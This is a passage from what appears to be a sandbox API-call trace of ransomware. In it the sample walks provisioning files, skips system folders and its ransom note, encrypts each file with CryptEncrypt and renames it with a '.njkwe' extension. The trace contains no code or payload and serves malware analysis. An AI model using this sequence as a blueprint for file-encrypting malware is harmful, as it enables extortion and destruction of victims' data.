returned 1 [0082.033] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.033] CloseHandle (hObject=0x444) returned 1 [0082.033] GetProcessHeap () returned 0xbe0000 [0082.033] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.033] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0082.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\553__connections_cellular_orange (mauritius)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\553__connections_cellular_orange (mauritius)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.034] GetProcessHeap () returned 0xbe0000 [0082.034] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.034] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913ddca3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913ddca3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913ddca3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", cAlternateFileName="554__C~1.PRO")) returned 1 [0082.034] lstrcmpiW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.034] lstrcmpiW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.034] lstrcmpiW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.034] lstrcmpiW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.034] lstrcmpiW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.034] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml") returned 161 [0082.034] StrStrIW (lpFirst="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.034] lstrcmpW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.034] lstrcmpW (lpString1="554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.034] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\554__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\554__connections_cellular_meditel (morocco)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.034] GetTickCount () returned 0x1154d13 [0082.034] GetTickCount () returned 0x1154d13 [0082.034] GetTickCount () returned 0x1154d13 [0082.034] GetTickCount () returned 0x1154d13 [0082.035] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.035] GetProcessHeap () returned 0xbe0000 [0082.035] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.035] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0082.036] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.036] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0082.036] GetProcessHeap () returned 0xbe0000 [0082.036] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.036] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.036] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.036] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.037] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.037] CloseHandle (hObject=0x444) returned 1 [0082.037] GetProcessHeap () returned 0xbe0000 [0082.037] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.037] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0082.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\554__connections_cellular_meditel (morocco)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\554__Connections_Cellular_Meditel (Morocco)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\554__connections_cellular_meditel (morocco)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.037] GetProcessHeap () returned 0xbe0000 [0082.038] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.038] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91403f0f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91403f0f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91403f0f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", cAlternateFileName="555__C~1.PRO")) returned 1 [0082.038] lstrcmpiW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.038] lstrcmpiW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.038] lstrcmpiW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.038] lstrcmpiW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.038] lstrcmpiW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.038] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml") returned 158 [0082.038] StrStrIW (lpFirst="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.038] lstrcmpW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.038] lstrcmpW (lpString1="555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.038] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\555__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\555__connections_cellular_orange (niger)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.038] GetTickCount () returned 0x1154d13 [0082.038] GetTickCount () returned 0x1154d13 [0082.038] GetTickCount () returned 0x1154d13 [0082.038] GetTickCount () returned 0x1154d13 [0082.038] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.038] GetProcessHeap () returned 0xbe0000 [0082.038] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.038] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0082.040] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.040] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c7, lpOverlapped=0x0) returned 1 [0082.040] GetProcessHeap () returned 0xbe0000 [0082.040] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.040] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.040] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.040] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.040] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.040] CloseHandle (hObject=0x444) returned 1 [0082.040] GetProcessHeap () returned 0xbe0000 [0082.040] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.040] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0082.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\555__connections_cellular_orange (niger)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\555__Connections_Cellular_Orange (Niger)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\555__connections_cellular_orange (niger)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.041] GetProcessHeap () returned 0xbe0000 [0082.041] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.041] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91403f0f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91403f0f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91403f0f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", cAlternateFileName="556__C~1.PRO")) returned 1 [0082.041] lstrcmpiW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.041] lstrcmpiW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.041] lstrcmpiW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.041] lstrcmpiW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.041] lstrcmpiW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.041] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml") returned 182 [0082.041] StrStrIW (lpFirst="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.041] lstrcmpW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.041] lstrcmpW (lpString1="556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.042] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\556__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.042] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\556__connections_cellular_cct (democratic republic of the congo)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.042] GetTickCount () returned 0x1154d13 [0082.042] GetTickCount () returned 0x1154d13 [0082.042] GetTickCount () returned 0x1154d13 [0082.042] GetTickCount () returned 0x1154d13 [0082.042] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.043] GetProcessHeap () returned 0xbe0000 [0082.043] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.043] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0082.044] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.044] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0082.044] GetProcessHeap () returned 0xbe0000 [0082.044] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.044] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.044] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.044] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.044] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.044] CloseHandle (hObject=0x444) returned 1 [0082.045] GetProcessHeap () returned 0xbe0000 [0082.045] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.045] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 202 [0082.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\556__connections_cellular_cct (democratic republic of the congo)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\556__Connections_Cellular_CCT (Democratic Republic of the Congo)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\556__connections_cellular_cct (democratic republic of the congo)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.045] GetProcessHeap () returned 0xbe0000 [0082.045] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.046] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91403f0f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91403f0f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91403f0f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", cAlternateFileName="557__C~1.PRO")) returned 1 [0082.046] lstrcmpiW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.046] lstrcmpiW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.046] lstrcmpiW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.046] lstrcmpiW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.046] lstrcmpiW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.046] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml") returned 160 [0082.046] StrStrIW (lpFirst="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.046] lstrcmpW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.046] lstrcmpW (lpString1="557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.046] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\557__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\557__connections_cellular_orange (senegal)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.046] GetTickCount () returned 0x1154d13 [0082.046] GetTickCount () returned 0x1154d13 [0082.046] GetTickCount () returned 0x1154d13 [0082.046] GetTickCount () returned 0x1154d13 [0082.046] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.046] GetProcessHeap () returned 0xbe0000 [0082.046] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.046] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x35d, lpOverlapped=0x0) returned 1 [0082.068] SetFilePointerEx (in: 